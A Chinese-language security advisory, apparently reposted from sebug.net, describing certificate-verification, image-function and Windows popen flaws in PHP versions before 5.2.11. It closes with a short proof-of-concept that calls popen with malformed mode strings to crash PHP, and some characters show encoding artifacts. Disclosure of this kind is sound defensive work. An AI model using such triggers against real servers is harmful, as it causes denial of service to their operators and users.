PHP是廣泛使用的通用目的腳本語言，特別適合于Web開發(fā)，可嵌入到HTML中。PHP的5.2.11之前版本的多個(gè)函數(shù)中存在安全漏洞，可能允許遠(yuǎn)程攻擊者導(dǎo)致拒絕服務(wù)或完全入侵用戶系統(tǒng)。

1) PHP的php_openssl_apply_verification_policy函數(shù)沒有正確的執(zhí)行證書驗(yàn)證，可能允許攻擊者通過偽造的證書執(zhí)行欺騙攻擊。

2) imagecolortransparent函數(shù)沒有正確的對(duì)顏色索引執(zhí)行過濾檢查。

3) 當(dāng)運(yùn)行在某些Windows操作系統(tǒng)上時(shí)，TSRM/tsrm_win32.c文件中的popen API函數(shù)允許攻擊者通過第二個(gè)參數(shù)中的特制e或er字符串導(dǎo)致拒絕服務(wù)。

<*參考

http://secunia.com/advisories/36791

http://bugs.php.net/bug.php?id=44683

*>

測(cè)試方法:

[www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!
$t1 = popen("echo hello", "e");
pclose($t1);
$t2 = popen("echo hello", "re");
pclose($t2);
$t3 = popen("echo hello", "er");
pclose($t3);
?>